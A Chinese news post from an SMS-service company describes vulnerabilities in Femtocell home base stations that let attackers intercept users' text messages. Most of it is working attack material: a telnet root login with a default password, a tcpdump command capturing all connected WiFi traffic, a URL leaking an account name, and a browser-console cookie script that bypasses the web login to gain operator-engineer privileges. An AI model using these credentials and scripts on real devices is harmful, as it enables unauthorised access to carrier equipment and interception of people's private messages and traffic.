短信积分商城 400-6699-521 咨询热线: 0371-69067686
行业动态Industry Dynamics
您的位置: 首页 > 乐信行业动态 >
家庭基站Femtocell截获任意短信漏洞,危及公众移动通信安全
  移动互联网发展到帐用户对短信、通话、数据流需求剧增,转向互动任意短信需求,而Femtocell设备可以被改造成伪基站短信群发器,截取家庭任意短信隐私,移动短信安全通信漏洞凸显。
  近日,有部分运营商通报Femtocell虽能瞬间解决室内ip网络覆盖问题,但是漏洞问题百出,很多厂家已经对全网设备进行紧急修复,漏洞暂时已经修复完成,但是漏洞问题还会存在吗?
  乐信揭秘Femtocell任意漏洞三大细节:
  ①root弱密码
  可以直接telnet登录,然后就是一个拥有root权限的Linux shell了。
  $ telnet 192.168.197.1
  login: root
  password: 5up
  顺便提一句,这个密码应该是Atheros的参考设计板PB44的默认密码,很多厂商拿来都不改。在搜索引擎上以"5up"和"root"为关键词,可以搜索到不少有趣的东西。
  并且发现上面的busybox基本没有裁剪,甚至连tcpdump功能都有。
  于是,可以直接抓取到所有连上此WiFi的流量:
  busybox tcpdump -i br0 not port 23
  ② 其它利用方式
  /mnt/flash/nvm/femtoOamStore.db 是 Sqlite3 的文件,可以使用sqlitebrowser直接查看
  闪灯 /mnt/flash/led_ctrl.sh [on|off]
  ③ RF 板卡渗透:Web 登录绕过
  访问 http://192.168.197.241/C/userProcessFunction.asp?reqType=4&role=marketUser 获得用户名为
  [email protected]
  然后在USER.js里发现原有的登录绕过问题没有得到修复,于是在浏览器中打开Console,输入以下脚本即可登录:
  SetCookie('role', 'marketUser');
  SetCookie('username', '[email protected]');
  SetCookie('levels', [-2, 0, 1, 3, 11, 13, 15, 16]);
  document.cookie = "loginFlag=1;";
  window.top.location = 'main.asp?r=' + Math.random() + '#index';
  登录之后,我们就拥有了与运营商派过来开站的工程师完全一样的操作权限!
(责任编辑:乐信企信通)